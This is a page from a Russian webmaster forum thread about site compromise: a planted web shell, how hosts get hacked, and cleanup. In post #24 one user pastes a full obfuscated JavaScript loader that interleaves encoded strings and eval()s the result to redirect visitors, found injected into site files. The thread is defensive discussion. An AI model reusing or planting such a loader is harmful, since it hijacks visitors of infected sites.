Форум Сайтостроение Безопасность

На сайте появился новый файл

1 23
GamletOrtikov
На сайте с 26.08.2011
Offline
95
GamletOrtikov
#21
LAWspb:
Как я понял у этого шела есть одна закономерность он лезет в папку modules и там в модуле XXXXX что то делает, снес этот модуль - так как он не используется.

Вы о том шелле, который я скинул? А что за модуль он ищет?

Sitealert:
Выполняет произвольный код.
Жаль и печально, что айболит его не обнаруживает почему-то.
Покупаем вкладыши TURBO (https://vk.com/fantiki_turbo)
Оптимизайка
На сайте с 11.03.2012
Offline
396
Оптимизайка
#22
Pentium Prescott:
Залили доры и шелл на сервер с Ispmanager. Как могли сделать?

/ru/forum/802085 ?

https://forum.antichat.ru/threads/442020/

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
S
На сайте с 30.09.2016
Offline
469
Sitealert
#23
Оптимизайка:
/ru/forum/802085 ?

https://forum.antichat.ru/threads/442020/

Оффтоп. Не из той оперы.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
fmdnepr
На сайте с 16.03.2011
Offline
51
fmdnepr
#24

Я в js-ках начал находить код редиректа, причем сейчас уже многие сайты с этой болячкой

Вот

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
S
На сайте с 30.09.2016
Offline
469
Sitealert
#25
fmdnepr:
Я в js-ках начал находить код редиректа

"Левый" код javascript - это вторично, - это то, от чего страдают простые пользователи сайта, и за что сайт наказывают поисковики. Первопричина же лежит в php-скриптах, и пока её не ликвидируете, так и будут Вам то редиректы устанавливать, то вирусы.

Сайт упал в выдаче Скрытие текста в статьях Бывают забаненые Гуглом домены?
fmdnepr
На сайте с 16.03.2011
Offline
51
fmdnepr
#26

Так первопричину нашел и хостится она на одном очень мутном хостинге, жалобы с доказательствами они игнорят. У себя эту гадость нашел и вылечил, а у других вижу почти каждый день.

GamletOrtikov
На сайте с 26.08.2011
Offline
95
GamletOrtikov
#27

В общем, если кому интересно, то по своей проблеме, которую я тут описывал пару месяцев назад, выявился положительный момент. На одном сайте ТИЦ вырос с 20 до 1300, а на другом сайте с 0 до 1400.

Понятное дело, что после публикации информации об этой проблеме на хабре и после множества жалоб многие поудаляли эти вирусные файлы с сайтов и ТИЦ вскоре начнёт падать, но надеюсь это будет не сильно и не быстро ))

500 ссылок за 25$ Всегда продаю домены с влияют ли на тИЦ
Аллочка
На сайте с 05.07.2016
Offline
19
Аллочка
#28

Похоже на взлом. Посмотрите на другие файлы, возможно, в них тоже что-то изменилось. Заражение одного элемента обычно представляет большой риск для остальных файлов вашего сайта.

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий